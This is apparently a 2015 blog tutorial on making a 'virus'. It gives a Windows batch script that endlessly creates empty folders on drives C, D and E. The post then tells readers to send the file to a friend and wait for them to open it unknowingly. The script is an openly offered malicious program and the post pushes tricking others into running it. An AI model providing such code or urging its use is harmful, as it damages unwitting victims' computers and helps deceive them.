Saturday, 5 September 2015

How to Create a Virus

Do you want to create a simple virus? Or want to learn how to make a fake virus? Then you are at the right place.
how to create a virus
Today I will teach you How to create a simple virus in Notepad. You don’t need any complicated program to create a virus, all you need is Notepad. It’s Best, It’s Free.
Creating a virus is a very simple task and you can also create a virus in less than 30 seconds. So today, let’s create a virus that keeps duplicating empty folders and can make around 1000 folders per seconds.

Use the code below and paste it in Notepad or Notepad++.

@echo off
:VIRUS
cd /d C:
md %RANDOM%
cd /d D:
md %RANDOM%
cd /d E:
md %RANDOM%
goto VIRUS


Source

Save this file as a .bat file and then send it to a friend. Many people save all downloaded files on the desktop. So, Now just wait for your friends to open this file. THEY SHOCKED YOU ROCKED.

No comments:

Post a Comment